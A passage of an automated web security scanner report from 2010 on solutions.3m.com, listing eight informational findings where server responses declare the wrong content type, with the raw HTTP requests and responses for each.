User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916826803:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:15:13 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 01 Apr 2010 16:49:28 GMT
ETag: "35173a-451e-a55ed600"
Accept-Ranges: bytes
Content-Length: 17694
Served-By: Pyrite11
Content-Type: text/html

var CHPaccheight = menutop = menuheight = totalBrands = count = 0;
var Pcounter = Pmenuwidth = Pmenuleft = 0;
var curBrand = 1;
var CHPps1 = CHPps2 = "";
var mousedover = 0;
var promosstopped = 0;
var
...[SNIP]...

5. Content type incorrectly stated  previous
There are 8 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


5.1. http://solutions.3m.com/3MContentRetrievalAPI/BlobServlet  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://solutions.3m.com
Path:   /3MContentRetrievalAPI/BlobServlet

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /3MContentRetrievalAPI/BlobServlet?locale=en_WW&univid=1180613747855&fallback=true&assetType=MMM_Image&blobAttribute=ImageFile&version=current HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://www.3m.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:13:55 GMT
Server: IBM_HTTP_Server
Content-Disposition: inline; fileName=messages-en_WW.js
Cache-Control: max-age=900
Expires: Tue, 16 Nov 2010 14:28:50 GMT
Last-Modified: Thu, 11 Jun 2009 16:33:38 GMT
Vary: Accept-Encoding,User-Agent
Served-By: Pyrite10
Content-Type: text/javascript
Content-Language: en-US
Content-Length: 86

message="Remember this choice?";
accept="Yes";
deny="No";
dir="ltr"

5.2. http://solutions.3m.com/en_US/images/blobservlet10d5html.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://solutions.3m.com
Path:   /en_US/images/blobservlet10d5html.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /en_US/images/blobservlet10d5html.html?locale=en_US&lmd=1251928675000&assetId=1180613431498&assetType=MMM_Image&blobAttribute=ImageFile HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916826803:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:15:12 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Sep 2009 21:57:55 GMT
ETag: "11f05ac-c00-5bf51ec0"
Accept-Ranges: bytes
Content-Length: 3072
Served-By: Pyrite9
Content-Type: text/html

//(c) 2006 Valerio Proietti (http://mad4milk.net). MIT-style license.
//moo.fx.js - depends on prototype.js OR prototype.lite.js
//version 2.0

var Fx = fx = {};

Fx.Base = Class.create({

   setOptions
...[SNIP]...

5.3. http://solutions.3m.com/en_US/images/blobservlet1e8fhtml.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://solutions.3m.com
Path:   /en_US/images/blobservlet1e8fhtml.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /en_US/images/blobservlet1e8fhtml.html?locale=en_US&lmd=1251928756000&assetId=1180610444093&assetType=MMM_Image&blobAttribute=ImageFile HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916826803:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:15:12 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Sep 2009 21:59:16 GMT
ETag: "11f0705-122bf-60c91500"
Accept-Ranges: bytes
Content-Length: 74431
Served-By: Pyrite9
Content-Type: text/html

var Prototype={Version:"1.6.0.2",Browser:{IE:!!(window.attachEvent&&!window.opera),Opera:!!window.opera,WebKit:navigator.userAgent.indexOf("AppleWebKit/")>-1,Gecko:navigator.userAgent.indexOf("Gecko")
...[SNIP]...

5.4. http://solutions.3m.com/en_US/images/blobservlet68dahtml.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://solutions.3m.com
Path:   /en_US/images/blobservlet68dahtml.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /en_US/images/blobservlet68dahtml.html?locale=en_US&lmd=1270140568000&assetId=1258564617341&assetType=MMM_Image&blobAttribute=ImageFile HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916826803:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:15:13 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 01 Apr 2010 16:49:28 GMT
ETag: "35173a-451e-a55ed600"
Accept-Ranges: bytes
Content-Length: 17694
Served-By: Pyrite11
Content-Type: text/html

var CHPaccheight = menutop = menuheight = totalBrands = count = 0;
var Pcounter = Pmenuwidth = Pmenuleft = 0;
var curBrand = 1;
var CHPps1 = CHPps2 = "";
var mousedover = 0;
var promosstopped = 0;
var
...[SNIP]...

5.5. http://solutions.3m.com/en_US/images/browser.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://solutions.3m.com
Path:   /en_US/images/browser.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /en_US/images/browser.css HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916826803:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:15:17 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Dec 2009 20:15:09 GMT
ETag: "884513-48cc-479d8a5d5ed40"-gzip
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Wed, 17 Nov 2010 14:15:17 GMT
Vary: Accept-Encoding,User-Agent
Served-By: Pyrite10
Content-Type: text/css
Content-Length: 18636

.H..solutions.3m.com....................................................................................................................................................................................
...[SNIP]...

5.6. http://solutions.3m.com/en_US/images/countrystyles.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://solutions.3m.com
Path:   /en_US/images/countrystyles.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /en_US/images/countrystyles.css HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916826803:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:15:12 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Dec 2009 20:15:09 GMT
ETag: "11f0739-48cc-a5d5ed40"
Accept-Ranges: bytes
Content-Length: 18636
Cache-Control: max-age=86400
Expires: Wed, 17 Nov 2010 14:15:12 GMT
Served-By: Pyrite9
Content-Type: text/css

.H..solutions.3m.com....................................................................................................................................................................................
...[SNIP]...

5.7. http://solutions.3m.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://solutions.3m.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeLoyalty_MID_jzaz6aHrDO=2; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916795440:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:14:02 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 13 Mar 2006 16:41:38 GMT
ETag: "76c007-876-4383480"
Accept-Ranges: bytes
Content-Length: 2166
Served-By: Pyrite12
Content-Type: text/plain

...... ..........&...........h.......(... ...@.........................................................................................................................................................
...[SNIP]...

5.8. http://solutions.3m.com/wps/themes/html/3M.com/ie_domload.js  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://solutions.3m.com
Path:   /wps/themes/html/3M.com/ie_domload.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /wps/themes/html/3M.com/ie_domload.js HTTP/1.1
Accept: */*
Referer: http://solutions.3m.com/wps/portal/3M/en_US/Products/ProdServ/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: solutions.3m.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:16:46 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 07 Oct 2005 14:13:54 GMT
Cache-Control: max-age=86400
Expires: Wed, 17 Nov 2010 14:16:46 GMT
Vary: Accept-Encoding,User-Agent
Served-By: Pyrite10
Content-Type: application/x-javascript
Content-Language: en-US
Content-Length: 11

initMenu();

Report generated by Hoyt LLC Research at Tue Nov 16 09:13:50 CST 2010.